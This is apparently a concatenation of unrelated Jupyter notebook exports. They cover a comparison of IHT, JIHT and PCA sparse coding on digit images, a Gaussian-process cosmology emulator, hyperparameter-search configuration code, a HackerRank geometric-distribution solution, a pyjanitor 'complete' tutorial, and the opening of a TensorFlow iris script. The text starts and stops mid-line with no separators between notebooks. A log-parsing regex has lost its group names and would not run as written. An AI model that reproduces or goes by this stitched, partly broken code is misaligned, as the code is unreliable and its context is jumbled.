test data point _, iht_test_codes,_ = iht_model(b_test_x) print(iht_test_codes.shape) for key, tensor_list in iht_class_svd.items(): if len(iht_class_svd[key]) > 0: x_test_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(iht_test_codes, iht_class_svd[key])**2, axis=1)) label_estimates_iht = np.argmax(x_test_proj, axis=1) class_error_rate_iht = 100*(1 - np.sum(np.sum(label_estimates_iht == b_test_labels.data.numpy()))/test_batch_size) print("IHT classification error rate via the projection method: ", class_error_rate_iht, "%")torch.Size([2000, 
500]) IHT classification error rate via the projection method: 5.8 %Breakdown of classification error by class:true = b_test_labels.data.numpy() class_count = np.zeros((10,1)) class_correct_count = np.zeros((10,1)) for i in range(len(true)): if label_estimates_iht[i] == true[i]: class_correct_count[true[i]] = class_correct_count[true[i]] + 1 class_count[true[i]] = class_count[true[i]] + 1 iht_class_error = 100*(1-np.divide(class_correct_count, class_count)) print('Error rate by class') for i in range(10): temp = float(iht_class_error[i]) print("Class {a:.0f} - classification error: {b:.1f}%".format(a=i, b=temp))Error rate by class Class 0 - classification error: 1.1% Class 1 - classification error: 0.0% Class 2 - classification error: 10.5% Class 3 - classification error: 8.0% Class 4 - classification error: 5.1% Class 5 - classification error: 11.9% Class 6 - classification error: 2.1% Class 7 - classification error: 8.3% Class 8 - classification error: 7.1% Class 9 - classification error: 4.5%JIHT Model JIHT Reconstruction Firstly just load the JIHT model and check few examples for visual inspection.# Load mode import auxillary as aux importlib.reload(aux) N_TEST_IMG = 5 jiht_model_id = '486709' #'330096' #'35576'#'330096''102095' jiht_model_filename = 'JIHT' + jiht_model_id jiht_model = aux.load_model(jiht_model_filename) # Check that reconstructions etc. are working as they fig = plt.figure(figsize=(5, 2)) # original data (first row) for viewing # view_data = Variable(test_data.test_data[:N_TEST_IMG].view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = Variable(b_test_x.view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = view_data.to(device) jiht_test_decoded, encoded, errJIHT = jiht_model.forward(view_data) for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+1) plt.imshow(np.reshape(view_data.cpu().data.numpy()[i], (28, 28)), cmap='gray') for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+6) plt.imshow(np.reshape(jiht_test_decoded.cpu().data.numpy()[i], (28, 28)), cmap='gray') plt.show()Calculate overall train and test reconstruction error:# Process entire data set for the reconstruction test train_decoding, train_encoding, errJIHT_train = jiht_model(b_train_x) test_decoding, test_encoding, errJIHT_test = jiht_model(b_test_x) print('Train error: ', errJIHT_train[-1]) print('Test error: ', errJIHT_test[-1])Train error: 0.276716858149 Test error: 0.268991529942JIHT Classification We are trying to calculate the low dimensional manifold that best represents each class in the encoded space space. 
To do this we calculate a set of encodings for each class, and then carry out SVD on this class to find a low dimensional linear manifold which each member of that class at least roughly lies on.from numpy import linalg as LA from sklearn.decomposition import PCA # Initialise the dictionaries to hold the encodings and span of the linear manifolds for each class jiht_class_codes = {} jiht_class_svd = {} # Process each class set of data points and calculate linear manifold for key, tensor_list in data_by_class.items(): if len(data_by_class[key]) > 0: _, jiht_class_codes[key], _ = jiht_model.forward(data_by_class[key]) temp_npy = np.asarray(jiht_class_codes[key]) U, S, Vh = LA.svd(temp_npy.transpose(), full_matrices=True, compute_uv=True) jiht_class_svd[key] = U[:,:L]With the linear manifold calculated for each class test by processing the test data set and classifying each test data point by projecting onto each class linear manifold, and assign it a label by choosing the class for which it has the smallest projection (is closest to).# Initialise matrix to store the projections of each data point onto each class x_test_proj = np.zeros((test_batch_size, 10)) # Create sparse code for each test data point _, jiht_test_codes,_ = jiht_model(b_test_x) for key, tensor_list in jiht_class_svd.items(): if len(jiht_class_svd[key]) > 0: x_test_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(jiht_test_codes, jiht_class_svd[key])**2, axis=1)) label_estimates_jiht = np.argmax(x_test_proj, axis=1) class_error_rate_jiht = 100*(1 - np.sum(np.sum(label_estimates_jiht == b_test_labels.data.numpy()))/test_batch_size) print("JIHT classification error rate via the projection method: ", class_error_rate_jiht, "%")JIHT classification error rate via the projection method: 5.8 %One reason why JIHT may be underperfoming in the classification task is that although classes are people clustered well, there may not be a natural mechanism to ensure that classes are well seperated. One way in which we can test this is firstly analyse if there is any particular class that has a higher than average classification error rate, the other is to observe the supports of each and look at the overlaptrue = b_test_labels.data.numpy() class_count = np.zeros((10,1)) class_correct_count = np.zeros((10,1)) for i in range(len(true)): if label_estimates_jiht[i] == true[i]: class_correct_count[true[i]] = class_correct_count[true[i]] + 1 class_count[true[i]] = class_count[true[i]] + 1 jiht_class_error = 100*(1-np.divide(class_correct_count, class_count)) print('Error rate by class') for i in range(10): temp = float(jiht_class_error[i]) print("Class {a:.0f} - classification error: {b:.1f}%".format(a=i, b=temp))Error rate by class Class 0 - classification error: 0.6% Class 1 - classification error: 0.0% Class 2 - classification error: 6.4% Class 3 - classification error: 11.0% Class 4 - classification error: 4.6% Class 5 - classification error: 13.1% Class 6 - classification error: 2.6% Class 7 - classification error: 7.9% Class 8 - classification error: 7.1% Class 9 - classification error: 6.1%PCA Model PCA Reconstruction To create a parrallel and fair benchmark with PCA we consider calculating in some sense an equivalent dictionary of linear basis elements as to those we learn with the IHT and JIHT during training. 
Then we enforce sparsity by projecting each test data point onto each of the principal components, and reconstruct by combining the largest 25 using the inner product as the coefficient.# Calculate PCA 'dictionary' pca = PCA(n_components=numb_atoms) pca.fit_transform(b_train_x) princ_components = pca.components_ print(princ_components.shape)(500, 784)Now that we have the 'dictionary' of vectors (principal components we calculate the inner product between each of the test data points and the atoms of the PCA dictionary. We reconstruct by doing the combining the K principal components in a linear combination with their respective inner products with the data point acting as coefficients. Might be better in some sense to find the coefficients by solving a linear system for each coefficient? This would either mean solving the thin matrix system for each data point or doing soem sort of sparse coding setup.N_TEST_IMG = 5 train_inner_products = np.matmul(princ_components, np.transpose(b_train_x.data.cpu().numpy())) order = np.sort(np.abs(train_inner_products), axis=0) Kth_largest_elements = order[K,:] mask = train_inner_products>Kth_largest_elements pca_train_decoded = np.transpose(np.matmul(np.transpose(princ_components), mask*train_inner_products)) test_inner_products = np.matmul(princ_components, np.transpose(b_test_x.data.cpu().numpy())) order = np.sort(np.abs(test_inner_products), axis=0) Kth_largest_elements = order[K,:] mask = test_inner_products>Kth_largest_elements pca_test_decoded = np.transpose(np.matmul(np.transpose(princ_components), mask*test_inner_products)) # Check that reconstructions etc. are working as they fig = plt.figure(figsize=(5, 2)) # original data (first row) for viewing # view_data = Variable(test_data.test_data[:N_TEST_IMG].view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = Variable(b_test_x.view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = view_data.to(device) for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+1) plt.imshow(np.reshape(view_data.cpu().data.numpy()[i], (28, 28)), cmap='gray') for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+6) plt.imshow(np.reshape(pca_test_decoded[i], (28, 28)), cmap='gray') plt.show()The reconstruction error across the test set is as follows.pca_train_error = np.linalg.norm(np.asarray(b_train_x) - pca_train_decoded,'fro') / np.linalg.norm(np.asarray(b_train_x),'fro') pca_test_error = np.linalg.norm(np.asarray(b_test_x) - pca_test_decoded,'fro') / np.linalg.norm(np.asarray(b_test_x),'fro') print('Train error: ', pca_train_error) print('Test error: ', pca_test_error)Train error: 0.650400993532 Test error: 0.645532561295PCA Classification - method 1 (based on reconstruction filters) This method is in some sense closer and fairer to what we do with IHT and JIHT. Here we project each test data point onto the set of pca components we have extracted and are using as a dictionary. 
Then we we take the SVD of this in the representation space to see weather the PCA forward pass at least approximatly maps data points onto lower dimension linear manifolds.from numpy import linalg as LA from sklearn.decomposition import PCA # Initialise the dictionaries to hold the encodings and span of the linear manifolds for each class pca1_class_codes = {} pca1_class_svd = {} # Process each class set of data points and calculate linear manifold for key, tensor_list in data_by_class.items(): if len(data_by_class[key]) > 0: test_inner_products= np.matmul(princ_components, np.transpose(data_by_class[key].data.cpu().numpy())) order = np.sort(np.abs(test_inner_products), axis=0) Kth_largest_elements = order[K,:] mask = test_inner_products>Kth_largest_elements pca1_class_codes[key] = mask*test_inner_products temp_npy = np.asarray(pca1_class_codes[key]) U, S, Vh = LA.svd(temp_npy.transpose(), full_matrices=True, compute_uv=True) pca1_class_svd[key] = U[:,:L]With the linear manifold calculated for each class, test by processing the test data set and classifying each test data point by projecting onto each class linear manifold, and assign it a label by choosing the class for which it has the smallest projection (is closest to). The representation we have is essentially thresholding using the 500 largest PCA components from the training data set.# Initialise matrix to store the projections of each data point onto each class x_test_proj = np.zeros((test_batch_size, 10)) test_inner_products= np.matmul(princ_components, np.transpose(b_test_x.data.cpu().numpy())) order = np.sort(np.abs(test_inner_products), axis=0) Kth_largest_elements = order[K,:] mask = test_inner_products>Kth_largest_elements pca1_test_rep = test_inner_products*mask for key, tensor_list in pca1_class_svd.items(): if len(pca1_class_svd[key]) > 0: x_test_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(pca1_test_rep , pca1_class_svd[key])**2, axis=1)) label_estimates_pca1 = np.argmax(x_test_proj, axis=1) class_error_rate_pca1 = 100*(1 - np.sum(np.sum(label_estimates_pca1 == b_test_labels.data.numpy()))/test_batch_size) print("PCA classification error rate via the projection method: ", class_error_rate_pca1, "%")PCA Classification - method 2 (not based on reconstruction filters) To make a fair benchmark for classification we once again use the sorted training data to create linear manifolds based of the largest L PCA components.pca_class = {} for key, tensor_list in data_by_class.items(): if len(data_by_class[key]) > 0: temp_npy = np.asarray(data_by_class[key]) pca = PCA(n_components=L) pca.fit_transform(temp_npy) pca_class[key] = np.transpose(pca.components_)Now we perform analagous steps as before, however instead of projecting into some encoding space and our linear manifolds are in the image space in the case of PCA. We simply project each image onto each class linear manifold and assign it the label of the class that is closest. We could see this as assigning the principal components of a set of data points belonging to a class as the features or atoms for a given class. This is kind of similar to the idea of assigining a set of features to each filter. If we were to do this for IHT it would mean we train the particular filters for a class based on the examples of that class in the batch. 
Over many layers this belays the point that we have feature sharing, which is a key benefit of the efficiency and efficacy of CNNs.# Initialise matrix to store the projections of each data point onto each class x_test_proj = np.zeros((test_batch_size, 10)) for key, tensor_list in pca_class.items(): if len(pca_class[key]) > 0: x_test_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(b_test_x, pca_class[key])**2, axis=1)) label_estimates_pca = np.argmax(x_test_proj, axis=1) class_error_rate_pca = 100*(1 - np.sum(np.sum(label_estimates_pca == b_test_labels.data.numpy()))/test_batch_size) print("PCA classification error rate via the projection method: ", class_error_rate_pca, "%")PCA classification error rate via the projection method: 4.95 %It is informative to view the breakdown in error in terms of by class:true = b_test_labels.data.numpy() class_count = np.zeros((10,1)) class_correct_count = np.zeros((10,1)) for i in range(len(true)): if label_estimates_pca[i] == true[i]: class_correct_count[true[i]] = class_correct_count[true[i]] + 1 class_count[true[i]] = class_count[true[i]] + 1 pca_class_error = 100*(1-np.divide(class_correct_count, class_count)) print('Error rate by class') for i in range(10): temp = float(pca_class_error[i]) print("Class {a:.0f} - classification error: {b:.1f}%".format(a=i, b=temp))Error rate by class Class 0 - classification error: 0.0% Class 1 - classification error: 3.4% Class 2 - classification error: 5.9% Class 3 - classification error: 7.0% Class 4 - classification error: 4.1% Class 5 - classification error: 7.7% Class 6 - classification error: 2.6% Class 7 - classification error: 7.4% Class 8 - classification error: 4.9% Class 9 - classification error: 6.1%Side by side comparison ReconstructionN_TEST_IMG = 5 fig = plt.figure(figsize=(5, 4)) plt.figure(figsize=(20,20)) view_data = Variable(b_test_x.view(-1, 28*28).type(torch.FloatTensor)/255.) 
view_data = view_data.to(device) for i in range(N_TEST_IMG): plt.subplot(4,N_TEST_IMG,i+1) plt.imshow(np.reshape(view_data.cpu().data.numpy()[i], (28, 28)), cmap='gray') if i == 0: plt.ylabel("Original") for i in range(N_TEST_IMG): plt.subplot(4,N_TEST_IMG,i+6) plt.imshow(np.reshape(iht_test_decoded.cpu().data.numpy()[i], (28, 28)), cmap='gray') if i == 0: plt.ylabel("IHT") for i in range(N_TEST_IMG): plt.subplot(4,N_TEST_IMG,i+11) plt.imshow(np.reshape(jiht_test_decoded.cpu().data.numpy()[i], (28, 28)), cmap='gray') if i == 0: plt.ylabel("JIHT") for i in range(N_TEST_IMG): plt.subplot(4,N_TEST_IMG,i+16) plt.imshow(np.reshape(pca_test_decoded[i], (28, 28)), cmap='gray') if i == 0: plt.ylabel("PCA") print("IHT - train error: {a:.2f}%, test error: {b:.2f}%".format(a=100*errIHT_train[-1], b=100*errIHT_test[-1])) print("JIHT - train error: {a:.2f}%, test error: {b:.2f}%".format(a=100*errJIHT_train[-1], b=100*errJIHT_test[-1])) print("PCA - train error: {a:.2f}%, test error: {b:.2f}%".format(a=100*pca_train_error, b=100*pca_test_error))IHT - train error: 24.83%, test error: 24.64% JIHT - train error: 27.67%, test error: 26.90% PCA - train error: 65.04%, test error: 64.55%Classificationl = [5, 10, 15, 20, 25, int(L)] classification_error_rate_iht = np.zeros((len(l), 1)) x_test_iht_proj = np.zeros((test_batch_size, 10)) classification_error_rate_jiht = np.zeros((len(l), 1)) x_test_jiht_proj = np.zeros((test_batch_size, 10)) classification_error_rate_pca = np.zeros((len(l), 1)) x_test_pca_proj = np.zeros((test_batch_size, 10)) index = 0 for i in l: for key, tensor_list in iht_class_svd.items(): if len(iht_class_svd[key]) > 0: x_test_iht_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(iht_test_codes, iht_class_svd[key][:, :i])**2, axis=1)) label_estimates_iht = np.argmax(x_test_iht_proj, axis=1) classification_error_rate_iht[index] = 100*(1 - np.sum(np.sum(label_estimates_iht == b_test_labels.data.numpy()))/test_batch_size) for key, tensor_list in jiht_class_svd.items(): if len(jiht_class_svd[key]) > 0: x_test_jiht_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(jiht_test_codes, jiht_class_svd[key][:, :i])**2, axis=1)) label_estimates_jiht = np.argmax(x_test_jiht_proj, axis=1) classification_error_rate_jiht[index] = 100*(1 - np.sum(np.sum(label_estimates_jiht == b_test_labels.data.numpy()))/test_batch_size) for key, tensor_list in pca_class.items(): if len(pca_class[key]) > 0: x_test_pca_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(b_test_x, pca_class[key][:, :i])**2, axis=1)) label_estimates_pca = np.argmax(x_test_pca_proj, axis=1) classification_error_rate_pca[index] = 100*(1 - np.sum(np.sum(label_estimates_pca == b_test_labels.data.numpy()))/test_batch_size) index = index+1 plt.figure(figsize=(10,10)) plt.plot(l, classification_error_rate_iht, label='IHT') plt.plot(l, classification_error_rate_jiht, label='JIHT') plt.plot(l, classification_error_rate_pca, label='PCA') plt.legend() plt.ylabel('Test classification Error (%)') plt.show() class_axis = np.arange(10) plt.figure(figsize=(10,10)) plt.scatter(class_axis, iht_class_error, label='IHT') plt.scatter(class_axis, jiht_class_error, label='JIHT') plt.scatter(class_axis, pca_class_error, label='PCA') plt.legend() plt.ylabel('Test classification Error (%)') plt.show()Emulator: Gaussian Process (`george`) Index1. [Import packages](imports)2. [Load data](loadData) 1. [Load train data](loadTrainData) 2. [Load test data](loadTestData)3. [Emulator method](emulator) 1. [Scale data](scaleData) 2. [Train emulator](trainEmu) 3. [Plot results](plotEmu) 1. 
Import packagesimport george import matplotlib.pyplot as plt import numpy as np import pandas as pd import pickle import scipy.optimize as op import seaborn as sns from sklearn.preprocessing import StandardScalerAesthetic settings%matplotlib inline sns.set(font_scale=1.3, style="ticks")2. Load dataRead the training data from a `.npy` file: 2.1. Load train data For the full demo, we'll use 1d data (a single input parameter/feature), but you can also try it the full 3d data; this just takes a long time to train, so you might want to load in our already saved results below to view it. Remember to load in the corresponding test data below.path_train = '../data/cosmology_train_1d.pickle' #path_train = '../data/cosmology_train.pickle' #path_train = '../data/cosmology_train_big.pickle' with open(path_train, 'rb') as input_file: data_train = pickle.load(input_file) input_train = data_train['input_data'] output_train = data_train['output_data'] number_train = input_train.shape[0] number_param = input_train.shape[1] - 1 n_values = output_train.shape[1]-1 print("Number of datapoints:", number_train) print("Number of input parameters:", number_param) # remove the `object_id` column extra_train = data_train['extra_input'] r_vals = extra_train['r_vals'] xs_train = input_train.drop(columns=['object_id']) ys_train = output_train.drop(columns=['object_id'])2.2. Load test datapath_test = '../data/cosmology_test_1d.pickle' #path_test = '../data/cosmology_test.pickle' with open(path_test, 'rb') as input_file: data_test = pickle.load(input_file) input_test = data_test['input_data'] output_test = data_test['output_data'] number_test = input_test.shape[0] print("Number of datapoints:", number_test) xs_test = input_test.drop(columns=['object_id']) ys_test = output_test.drop(columns=['object_id'])3. Emulator method 3.1. Scale dataLet's first scale our input parameters, to make training easier:scaler = StandardScaler() scaler.fit(xs_train) xs_train.iloc[:] = scaler.transform(xs_train) xs_test.iloc[:] = scaler.transform(xs_test) y_mean = np.mean(ys_train, axis=0) ys_train = ys_train/y_mean ys_test = ys_test/y_mean3.2. Train emulatordef fit_gp(kernel, xs, ys, xs_new): def neg_log_like(p): # Objective function: negative log-likelihood gp.set_parameter_vector(p) loglike = gp.log_likelihood(ys, quiet=True) return -loglike if np.isfinite(loglike) else 1e25 def grad_neg_log_like(p): # Gradient of the objective function. gp.set_parameter_vector(p) return -gp.grad_log_likelihood(ys, quiet=True) gp = george.GP(kernel) gp.compute(xs) results = op.minimize(neg_log_like, gp.get_parameter_vector(), jac=grad_neg_log_like, method="L-BFGS-B", tol=1e-6) gp.set_parameter_vector(results.x) gp_mean, gp_cov = gp.predict(ys, xs_new) return gp_meanHere we are going to train and predict the value straight away. (If you're loading in saved results, comment out the next 2 cells.)number_outputs = np.shape(ys_test)[1] print(number_outputs) ys_test_preds = ys_test.copy() ys_train_0 = ys_train.iloc[:, 0] for i in np.arange(number_outputs): print(i) ys_train_i = ys_train.iloc[:, i] kernel = np.var(ys_train_0) * george.kernels.ExpSquaredKernel(0.5, ndim=number_param) ys_pred = fit_gp(kernel=kernel, xs=xs_train, ys=ys_train_i, xs_new=xs_test) ys_test_preds.iloc[:, i] = ys_predUndo all the normalizations.ys_test = ys_test*y_mean ys_test_preds = ys_test_preds*y_meanSave results. 
(Commented out as results have already been saved.)path_save_results = f'emulator_results/output_pred_big_train_{number_param}d.pickle' #ys_test_preds.to_pickle(path_save_results)Verify the results were well saved. (If you're looking at the 3d data, you'll want to load this in here.)#ys_test_preds_saved = pd.read_pickle(path_save_results) #np.allclose(ys_test_preds_saved, ys_test_preds) #ys_test_preds = ys_test_preds_saved3.3. Plot resultsWe compare our predictions to the truth (choosing a subset for visual clarity).n_plot = int(0.2*number_test) idxs = np.random.choice(np.arange(number_test), n_plot) color_idx = np.linspace(0, 1, n_plot) colors = np.array([plt.cm.rainbow(c) for c in color_idx]) plt.figure(figsize=(8,6)) for i in range(n_plot): ys_test_i = ys_test.iloc[idxs[i], :] ys_pred_i = ys_test_preds.iloc[idxs[i], :] if i==0: label_test = 'truth' label_pred = 'emu_prediction' else: label_test = None label_pred = None plt.plot(r_vals, ys_test_i, alpha=0.8, label=label_test, marker='o', markerfacecolor='None', ls='None', color=colors[i]) plt.plot(r_vals, ys_pred_i, alpha=0.8, label=label_pred, color=colors[i]) plt.xlabel('$r$') plt.ylabel(r'$\xi(r)$') plt.legend()We plot the fractional error of all test set statistics:color_idx = np.linspace(0, 1, number_test) colors = np.array([plt.cm.rainbow(c) for c in color_idx]) plt.figure(figsize=(8,6)) frac_errs = np.empty((number_test, n_values)) for i in range(number_test): ys_test_i = ys_test.iloc[i, :] ys_pred_i = ys_test_preds.iloc[i, :] frac_err = (ys_pred_i-ys_test_i)/ys_test_i frac_errs[i] = frac_err plt.plot(r_vals, frac_err, alpha=0.8, color=colors[i]) plt.axhline(0.0, color='k') plt.xlabel('$r$') plt.ylabel(r'fractional error')We show the spread of these fractional errors:color_idx = np.linspace(0, 1, number_test) colors = np.array([plt.cm.rainbow(c) for c in color_idx]) plt.figure(figsize=(8,6)) frac_errs_stdev = np.std(frac_errs, axis=0) plt.plot(r_vals, frac_errs_stdev, alpha=0.8, color='blue', label='standard deviation') frac_errs_p16 = np.percentile(frac_errs, 16, axis=0) frac_errs_p84 = np.percentile(frac_errs, 84, axis=0) frac_errs_percentile = np.mean([np.abs(frac_errs_p16), np.abs(frac_errs_p84)], axis=0) plt.plot(r_vals, frac_errs_percentile, alpha=0.8, color='green', label="mean of 16/84 percentile") plt.xlabel('$r$') plt.ylabel(r'spread of fractional errors') plt.legend()os.mkdir('hp_search/models') os.mkdir('hp_search')os.mkdir('hp_search/conf') os.mkdir('hp_search/conf_json')import json max_digits = len(str(len(lstm_confs))) full_confs = [] for i, conf in enumerate(lstm_confs): fc = configs.create_conf_file(f'hp_search/conf/morph_charlstm.{str(i).zfill(max_digits)}.conf', f'hp_search/models/morph_charlstm.{str(i).zfill(max_digits)}.model', 'gold_morpheme', conf, 'alt_tok_yap_ft_sg') full_confs.append(fc) for i, fc in enumerate(full_confs): with open( f'hp_search/conf_json/morph_charlstm.{str(i).zfill(max_digits)}.json', 'w') as of: of.write(json.dumps(fc)) max_digits = len(str(len(cnn_confs))) full_confs = [] for i, conf in enumerate(cnn_confs): fc = configs.create_conf_file(f'hp_search/conf/morph_charcnn.{str(i).zfill(max_digits)}.conf', f'hp_search/models/morph_charcnn.{str(i).zfill(max_digits)}.model', 'gold_morpheme', conf, 'alt_tok_yap_ft_sg') full_confs.append(fc) for i, fc in enumerate(full_confs): with open( f'hp_search/conf_json/morph_charcnn.{str(i).zfill(max_digits)}.json', 'w') as of: of.write(json.dumps(fc))Tokenmax_digits = len(str(len(lstm_confs))) full_confs = [] for i, conf in enumerate(lstm_confs): fc = 
configs.create_conf_file(f'hp_search/conf/token_charlstm.{str(i).zfill(max_digits)}.conf', f'hp_search/models/token_charlstm.{str(i).zfill(max_digits)}.model', 'gold_token_bioes', conf, 'alt_tok_tokenized_ft_sg') full_confs.append(fc) for i, fc in enumerate(full_confs): with open( f'hp_search/conf_json/token_charlstm.{str(i).zfill(max_digits)}.json', 'w') as of: of.write(json.dumps(fc)) max_digits = len(str(len(cnn_confs))) full_confs = [] for i, conf in enumerate(cnn_confs): fc = configs.create_conf_file(f'hp_search/conf/token_charcnn.{str(i).zfill(max_digits)}.conf', f'hp_search/models/token_charcnn.{str(i).zfill(max_digits)}.model', 'gold_token_bioes', conf, 'alt_tok_tokenized_ft_sg') full_confs.append(fc) for i, fc in enumerate(full_confs): with open( f'hp_search/conf_json/token_charcnn.{str(i).zfill(max_digits)}.json', 'w') as of: of.write(json.dumps(fc))Check resultslen(cnn_confs[0]), len(lstm_confs[0]) lstm_confs[0] import re DEV_RES_LINE = re.compile('Dev: .*; acc: (?P[^,]+), p: (?P

[^,]+), r: (?P[^,]+), f: (?P[-\d\.]+)') res = [] for f in os.scandir('hp_search/logs'): if f.name.startswith('.ipy'): continue arch = f.name.split('.')[0] conf_num = f.name.split('.')[1] matching_conf = cnn_confs[int(conf_num)] if 'cnn' in arch else lstm_confs[int(conf_num)] params = { 'arch': arch, 'conf_num': conf_num} params.update(matching_conf) with open(f.path, 'r') as fp: i= 0 for line in fp: m = DEV_RES_LINE.match(line) if m: r = m.groupdict().copy() for k, v in r.items(): r[k] = float(v) r.update(params) r['epoch'] = i i+=1 res.append(r) rdf = pd.DataFrame(res) rdf.head() rdf.groupby(['conf_num', 'arch']).f.max().unstack() rdf.shape rdf.groupby('arch').f.max() rdf.groupby(['dropout', 'arch']).f.max().unstack() rdf.groupby(['hidden_dim', 'arch']).f.max().unstack() rdf.groupby(['lstm_layer', 'arch']).f.max().unstack() rdf.groupby(['optimizer', 'arch']).f.max().unstack() rdf[rdf.arch.str.contains('cnn')].groupby(['cnn_layer', 'arch']).f.max().unstack() rdf[rdf.arch.str.contains('lstm')].groupby(['char_hidden_dim', 'arch']).f.max().unstack() rdf.groupby(['optimizer', 'learning_rate', 'arch']).f.max().unstack()Solution to: [Day 4: Geometric Distribution I](https://www.hackerrank.com/challenges/s10-geometric-distribution-1/problem) Table of Contents- Table of Contents- Notes - Negative Binomial Experiment - Negative Binomial Distribution - Geometric Distribution - Example- Math Solution- Solution - Imports - Input - Geometric Distribution - Format - Main%%javascript $.getScript('https://kmahelona.github.io/ipython_notebook_goodies/ipython_notebook_toc.js')Notes Negative Binomial ExperimentThe negative binomial experiment has the following properties:- n, independent trials- binary outcome: success (s), or failure (f)- P(s) is the same for every trial- experiment continues until `x` successes are observed.If X is the number of experiments until the `x`th success, then X is a discrete random variable called a negative binomial. Negative Binomial DistributionConsider the following *probability mass function*\begin{equation}\largeb^{*}\text{(x, n, p)} = {n - 1 \choose x - 1} * p^{x} * q^{n-x}\end{equation}This is a negative binomial with the following properties:- number of successes to be observed is x- n, number of trials- p, p(x) in 1 trial- q, p(not x) in 1 trial- b*(x, n, p) is the negative binomial probability, MEANING: the probability of having x - 1 successes after n - 1 trials and having x successes after n trials Geometric Distribution*Geometric distribution* is the special case of a negative binomial distribution to determine the number of Bernoulli trials required for *a success*.Recall, X is the number of successes in n independent trials, so for each i, 1 <= i <= n\begin{equation}\largeX_{i}\begin{cases}1 \text{, if the ith trial is a success} \\0 \text{, otherwise}\end{cases}\end{equation}The geometric distribution is a negative binomial distribution where the number of successes is 1. We express this with the following formula:\begin{equation}\large\text{g(n, p)} = q^{n - 1} * p\end{equation} ExampleBob is a high school basketball player. He is a 70% free throw shooter, meaning his probability of making a free throw is 0.70. What is the probability that Bob makes his first free throw on his fifth shot?- n = 5- p = 0.7- q = 0.3\begin{equation}\large\text{ g(5, 0.7)} = 0.3^{4} * 0.7\end{equation}\begin{equation}\large0.00567\end{equation} Math SolutionThe probability that a machine produces a defective product is 1/3. 
What is the probability that the 1st defect is found during the 5th inspection?- n = 5- p = 1/3- q = 2/3\begin{equation}\large\text{g(n, p)} = q^{n-1} * p\end{equation}\begin{equation}\large(\frac{2}{3})^{4} * \frac{1}{3}\end{equation}\begin{equation}\large0.066\end{equation} Solution Importsfrom typing import TupleInputdef get_input() -> Tuple[float, int]: """Returns input for Day 4: Geometric distribution i. Returns: Tuple[float, int]: Geometric distribution p and n, respectively """ num, denom = [int(x) for x in input().split()] p = num / denom n = int(input()) return (p, n)Geometric Distributiondef calc_geom_dist(n: int, p: float) -> float: """Returns geometric distribution of n & p g(n, p) = q ** (n-1) * p Args: n (int): number of trials p (float): probability of x Returns: float: Geometric distribution, given n and p """ q = 1 - p return q ** (n-1) * pFormatdef format_scale(num: float) -> float: """Returns number formatted to scale Args: num (float): Number to format Returns: float: Number formatted to scale """ return "{:.3f}".format(num)Maindef main(): p, n = get_input() geom_dist = calc_geom_dist(n, p) print( format_scale(geom_dist)) if __name__ == "__main__": main()1 3 5 0.066Expose explicitly missing values with `complete`import pandas as pd import numpy as np import janitor # from http://imachordata.com/2016/02/05/you-complete-me/ df = pd.DataFrame( { "Year": [1999, 2000, 2004, 1999, 2004], "Taxon": [ "Saccharina", "Saccharina", "Saccharina", "Agarum", "Agarum", ], "Abundance": [4, 5, 2, 1, 8], } ) dfNote that Year 2000 and Agarum pairing is missing in the DataFrame above. Let’s make it explicit:df.complete('Year', 'Taxon') # A better viewing based on order df.complete('Year', 'Taxon', sort = True)What if we wanted the explicit missing values for all the years from 1999 to 2004? Easy - simply pass a dictionary pairing the column name with the new values:new_year_values = {'Year': range(df.Year.min(), df.Year.max() + 1)} df.complete(new_year_values, "Taxon")You can pass a callable as values in the dictionary:new_year_values = lambda year: range(year.min(), year.max() + 1) df.complete({"Year": new_year_values}, "Taxon", sort = True)You can get explcit rows, based only on existing data:# https://stackoverflow.com/q/62266057/7175713 df = {"Name" : ("Bob", "Bob", "Emma"), "Age" : (23,23,78), "Gender" :("Male", "Male", "Female"), "Item" : ("house", "car", "house"), "Value" : (5,1,3) } df = pd.DataFrame(df) dfIn the DataFrame above, there is no `car` Item value for the `Name`, `Age`, `Gender` combination -> `(Emma, 78, Female)`. Pass `(Name, Age, Gender)` and `Item` to explicitly expose the missing row:df.complete(('Name', 'Age', 'Gender'), 'Item')The example above showed how to expose missing rows on a group basis. 
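For intuition, the same completion can be reproduced with plain pandas by building the cartesian product of the observed (Name, Age, Gender) tuples and the observed Item values, then left-merging the original frame onto it. This is a rough sketch rather than janitor's actual implementation, and it assumes pandas >= 1.2 for `how='cross'`.

groups = df[['Name', 'Age', 'Gender']].drop_duplicates()
items = df[['Item']].drop_duplicates()
full = groups.merge(items, how='cross')  # every (Name, Age, Gender) x Item combination
completed = full.merge(df, on=['Name', 'Age', 'Gender', 'Item'], how='left')  # missing rows get NaN in Value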
There is also the option of exposing missing rows with the `by` parameter:df = pd.DataFrame( { "state": ["CA", "CA", "HI", "HI", "HI", "NY", "NY"], "year": [2010, 2013, 2010, 2012, 2016, 2009, 2013], "value": [1, 3, 1, 2, 3, 2, 5], } ) dfLet's expose all the missing years, based on the minimum and maximum year, for each state:result = df.complete( {'year': new_year_values}, by='state', sort = True ) resultYou can fill the nulls with Pandas' `fillna`:result.fillna(0, downcast = 'infer')import tensorflow as tf import numpy as np from sklearn import datasets from sklearn.model_selection import train_test_split RANDOM_SEED = 42 #tf.set_random_seed(RANDOM_SEED) #import tensorflow.compat.v1 as tf #tf.disable_v2_behavior() def init_weights(shape): """ Weight initialization """ weights = tf.random_normal(shape, stddev=0.1) return tf.Variable(weights) def forwardprop(X, w_1, w_2): """ Forward-propagation. IMPORTANT: yhat is not softmax since TensorFlow's softmax_cross_entropy_with_logits() does that internally. """ h = tf.nn.sigmoid(tf.matmul(X, w_1)) # The \sigma function yhat = tf.matmul(h, w_2) # The \varphi function return yhat def get_iris_data(): """ Read the iris data set and split them into training and test sets """ iris = datasets.load_iris() data = 